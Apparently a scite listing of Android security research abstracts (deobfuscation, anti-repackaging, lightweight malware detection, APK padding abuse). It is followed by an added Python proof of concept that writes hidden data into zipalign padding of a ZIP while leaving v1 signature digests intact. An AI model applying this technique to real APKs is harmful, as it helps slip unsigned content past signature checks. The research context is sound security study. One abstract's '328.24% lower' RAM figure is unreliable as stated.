The smartphone market continues to grow, with more than 6 billion smartphone users worldwide aided by 5G technology, and Android holds 87% of that market. Naturally, the widespread use of Android smartphones has drawn the attention of attackers who implement and spread malware, and the number of malware samples targeting Android phones is ever increasing. It is therefore critical to find and detect the malicious behaviors of malware in a timely manner. Unfortunately, attackers apply a variety of obfuscation techniques to malware to evade or delay detection. When an obfuscation technique such as class encryption is applied to a malicious application, static analysis yields no information about its malicious behaviors, so we must rely on manual dynamic analysis to uncover the behaviors concealed in obfuscated malware. To keep malware from spreading on a larger scale, we need an automated deobfuscation approach that accurately deobfuscates obfuscated malware so that its hidden malicious behaviors can be revealed. In this study, we introduce widely used obfuscation techniques and propose an effective deobfuscation method, named ARBDroid, that automatically deobfuscates string encryption, class encryption, and API hiding. Our evaluation results clearly demonstrate that our approach can deobfuscate obfuscated applications based on dynamic analysis results.
Leaks of sensitive information from applications are a critical issue in the Android ecosystem. Despite advances in techniques for securing applications such as packing and obfuscation, many applications remain exposed to repackaging attacks that inject malicious code and redistribute the application. Also, as we become more dependent on mobile technologies, more sensitive information is handled on our mobile devices, so reducing the risk of such leaks is of great importance. In this paper, we first present a threat model, named the ReMaCi attack, in which an attacker leaks users' sensitive information by means of a repackaging attack. By analyzing the top 8,546 applications downloaded from the Google Play Store, we show that 50% of them are vulnerable to the ReMaCi attack. We thus propose a novel automated static anti-analysis tool, called AmpDroid, for preventing sensitive information leaks. AmpDroid identifies sensitive dataflows and isolates the code that handles the sensitive data from the rest of the application. To demonstrate the effectiveness of AmpDroid, we evaluate its security and performance, comparing it with other obfuscation tools.
With the advent of 5G networks, edge devices and mobile and multimedia applications are in wide use, and malware targeting edge devices has appeared. In the fourth quarter of 2020, 43 million pieces of malware targeting mobile devices were observed. Many researchers have therefore studied ways to protect users from malware quickly, in particular by detecting malware on mobile devices with deep learning-based classification models that achieve high accuracy. However, such deep learning-based classifiers consume a lot of resources, while mobile devices have limited hardware resources such as RAM and battery, so these approaches are difficult to use on mobile devices in practice. In this work, we study how a deep learning classifier classifies malware and propose a novel approach for generating a light-weight classifier that detects malware efficiently and effectively, based on the insight that malware exhibits distinctive features because it is programmed to perform malicious actions such as information leaks. By analyzing and extracting the distinctive features that a deep learning classifier relies on from a malicious dataset, we generate a light-weight rule-based classifier, called LiDAR, that detects malware on edge devices efficiently and with high accuracy. On an edge device, LiDAR detects malware with 94% accuracy (F1-score), with 85.67% and 328.24% lower CPU and RAM usage, respectively, than a CNN classifier, and classifies 454.37% faster than that classifier.
Anonymous attackers have been targeting the Android ecosystem to carry out severe malicious activities. Although security researchers have patched many vulnerabilities, new ones continue to emerge. In this paper, we introduce a new type of vulnerability that can be exploited to hide data in an application file while bypassing Android's signing policy. Specifically, we exploit the padding areas that can be created by the alignment option when applications are packaged. We present a proof-of-concept implementation, VeileDroid, that exploits the vulnerability. Finally, we demonstrate the effectiveness of VeileDroid using a synthetic application that hides data in the padding area and updates that data without re-signing and updating the application on an Android device.
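As an added example (not VeileDroid or any code from the paper), the following Python builds a small stored-only ZIP with zipalign-style padding in each local file header's extra field, parses the local headers to find how many padding bytes each entry has, overwrites the padding of one entry with a constructed payload, and checks that every per-entry content digest (what a v1/JAR signature's MANIFEST.MF commits to) and every CRC are unchanged while the archive still opens as a valid ZIP. The entry names, the zero-byte padding and the payload are assumptions for illustration; real zipalign output carries a tagged extra-field record rather than plain zeros, but the padding sits in the same place.

```python
"""Locate and reuse zipalign-style padding in local file headers (added example)."""
import hashlib
import io
import struct
import zipfile
import zlib

LOCAL_SIG = b"PK\x03\x04"
CENTRAL_SIG = b"PK\x01\x02"
EOCD_SIG = b"PK\x05\x06"
DOS_DATE = (44 << 9) | (1 << 5) | 1  # 2024-01-01 in MS-DOS date format


def build_zip(entries):
    """Build a stored (method 0) ZIP from (name, data, alignment) tuples.

    Padding is placed in the local header's extra field so that the entry's
    data offset is a multiple of `alignment`, which is where zipalign puts it.
    Plain zero bytes are a simplification (assumption) of zipalign's record.
    """
    out, central = bytearray(), bytearray()
    for name, data, alignment in entries:
        name_b = name.encode("ascii")
        crc = zlib.crc32(data) & 0xFFFFFFFF
        header_end = len(out) + 30 + len(name_b)  # data start without padding
        extra = b"\x00" * ((-header_end) % alignment)
        local_off = len(out)
        out += LOCAL_SIG + struct.pack(
            "<HHHHHIIIHH", 20, 0, 0, 0, DOS_DATE, crc, len(data), len(data),
            len(name_b), len(extra))
        out += name_b + extra + data
        central += CENTRAL_SIG + struct.pack(
            "<HHHHHHIIIHHHHHII", 20, 20, 0, 0, 0, DOS_DATE, crc, len(data),
            len(data), len(name_b), 0, 0, 0, 0, 0, local_off) + name_b
    cd_off = len(out)
    out += central
    out += EOCD_SIG + struct.pack(
        "<HHHHIIH", 0, 0, len(entries), len(entries), len(central), cd_off, 0)
    return bytes(out)


def walk_local_headers(blob):
    """Yield (name, extra_off, extra_len, data_off, data_len) per local header.

    Assumes sizes are in the header (no data descriptors, flag bit 3), which
    holds for archives from build_zip() and for typical zipalign output.
    """
    pos = 0
    while blob.startswith(LOCAL_SIG, pos):
        (_, _, _, _, _, _, csize, _, nlen, xlen) = struct.unpack_from(
            "<HHHHHIIIHH", blob, pos + 4)
        name = blob[pos + 30:pos + 30 + nlen].decode("ascii")
        extra_off = pos + 30 + nlen
        data_off = extra_off + xlen
        yield name, extra_off, xlen, data_off, csize
        pos = data_off + csize


def entry_digests(blob):
    """SHA-256 of each entry's content: the quantity a v1 manifest digests."""
    return {name: hashlib.sha256(blob[d:d + n]).hexdigest()
            for name, _, _, d, n in walk_local_headers(blob)}


def padding_map(blob):
    """Extra-field bytes per entry: the area no per-entry digest covers."""
    return {name: xlen for name, _, xlen, _, _ in walk_local_headers(blob)}


def write_padding(blob, name, payload):
    """Overwrite the start of `name`'s extra field with payload."""
    for n, xoff, xlen, _, _ in walk_local_headers(blob):
        if n == name:
            if len(payload) > xlen:
                raise ValueError(f"{len(payload)} bytes exceed {xlen} bytes of padding")
            return blob[:xoff] + payload + blob[xoff + len(payload):]
    raise KeyError(name)


def read_padding(blob, name, length):
    """Read `length` bytes back out of `name`'s extra field."""
    for n, xoff, xlen, _, _ in walk_local_headers(blob):
        if n == name:
            return blob[xoff:xoff + min(length, xlen)]
    raise KeyError(name)


def demo():
    # Constructed entries; the page-aligned .so mirrors `zipalign -p` output.
    entries = [
        ("AndroidManifest.xml", b"<manifest/>", 4),
        ("lib/arm64-v8a/libnative.so", b"\x7fELF" + b"\x00" * 12, 4096),
    ]
    apk = build_zip(entries)
    target = "lib/arm64-v8a/libnative.so"
    secret = b"hidden config bytes"  # constructed payload
    tampered = write_padding(apk, target, secret)
    return {
        "padding": padding_map(apk),
        "digests_unchanged": entry_digests(apk) == entry_digests(tampered),
        "still_valid_zip": zipfile.ZipFile(io.BytesIO(tampered)).testzip() is None,
        "recovered": read_padding(tampered, target, len(secret)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The digest comparison is the point: a v1 (JAR) signature commits to each entry's content, not to the bytes between the file name and the data, so padding can be rewritten without touching any signed digest or CRC. APK Signature Scheme v2 and later hash the whole file outside the signing block, so the same edit breaks a v2/v3 signature; whether a device accepts the tampered file depends on which schemes it verifies and enforces.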
scite is a Brooklyn-based organization that helps researchers better discover and understand research articles through Smart Citations–citations that display the context of the citation and describe whether the article provides supporting or contrasting evidence. scite is used by students and researchers from around the world and is funded in part by the National Science Foundation and the National Institute on Drug Abuse of the National Institutes of Health.
Copyright © 2024 scite LLC. All rights reserved.